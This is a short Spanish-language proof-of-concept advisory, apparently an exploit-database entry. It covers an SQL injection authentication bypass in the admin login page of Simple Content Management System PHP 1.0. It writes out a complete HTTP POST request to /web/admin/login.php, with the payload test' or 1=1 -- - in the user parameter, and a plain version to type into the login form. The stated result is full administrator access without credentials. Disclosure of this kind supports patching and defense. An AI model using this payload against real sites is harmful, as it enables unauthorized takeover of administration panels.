
Prueba de concepto para la omisión de autenticación por inyección SQL en Simple Content Management System PHP, que permite a atacantes no autenticados obtener acceso de administrador mediante un parámetro de usuario manipulado.
Existe una vulnerabilidad de Inyección SQL en la página de inicio de sesión de administrador de
Simple Content Management System PHP. El parámetro user no se
sanea antes de pasarse a la consulta SQL, lo que permite a un
atacante no autenticado eludir la autenticación y obtener acceso
total de administrador.
/web/admin/login.phpusercode-projects.org
Simple Content Management System PHP
1.0
POST /web/admin/login.php HTTP/1.1
Host: [target]
Content-Type: application/x-www-form-urlencoded
user=test'+or+1%3D1+--+-&password=test&submit=Login
o simplemente añade esto en la página de inicio de sesión

test' or 1=1 -- -

Un atacante remoto no autenticado puede eludir el inicio de sesión de administrador por completo sin conocer ninguna credencial, obteniendo control total sobre el panel de administración, incluida la adición de contenido.
Imad Alvi